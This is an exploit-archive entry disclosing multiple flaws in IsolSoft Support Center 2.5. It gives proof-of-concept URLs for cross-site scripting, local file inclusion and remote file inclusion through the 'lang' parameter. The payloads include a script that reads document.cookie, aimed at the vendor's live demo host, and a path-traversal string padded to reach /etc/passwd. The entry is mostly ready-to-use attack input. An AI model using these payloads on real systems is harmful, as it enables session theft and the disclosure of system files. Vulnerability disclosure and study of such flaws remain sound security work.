IsolSoft Support Center 2.5 (RFI/LFI/XSS) Multiples Vulnerabilities

2009-08-07T00:00:00
ID 1337DAY-ID-5633
Type zdt
Reporter Moudi
Modified 2009-08-07T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ===================================================================
IsolSoft Support Center 2.5 (RFI/LFI/XSS) Multiples Vulnerabilities
===================================================================


/*


IsolSoft Support Center 2.5 (RFI/LFI/XSS) Multiples Vulnerabilities

Discovered By : Moudi
Download : http://www.isolsoft.com/

Greetings : Mizoz, Zuka, 599eme Man.

*/

[+] Exploit XSS:

- Vulnerable code in newticket (lang).

- Poc:
  http://127.0.0.1/newticket.php?lang=[XSS]
  http://www.isolsoft.com/demo/newticket.php?lang="><script>alert(document.cookie);</script>

[+] Exploit LFI:

- Vulnerable code in index.php (lang).
- Vulnerable code in newticket.php (lang).
- Vulnerable code in rempass.php (lang).

- Poc:
  http://127.0.0.1/index.php?adduser=true&lang=[LFI]
  http://127.0.0.1/newticket.php?lang=[LFI]
  http://127.0.0.1/rempass.php?lang=[LFI]
  http://www.isolsoft.com/demo/index.php?adduser=true&lang=[LFI]
  http://www.isolsoft.com/demo/newticket.php?lang=[LFI]
  http://www.isolsoft.com/demo/rempass.php?lang=[LFI]

LFI => ../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././..

[+] Exploit RFI:

- Vulnerable code in index.php (lang).
- Vulnerable code in newticket.php (lang).
- Vulnerable code in rempass.php (lang).

- Poc:
  http://127.0.0.1/index.php?adduser=true&lang=[RFI]
  http://127.0.0.1/newticket.php?lang=[RFI]
  http://127.0.0.1/rempass.php?lang=[RFI]




#  0day.today [2018-04-14]  #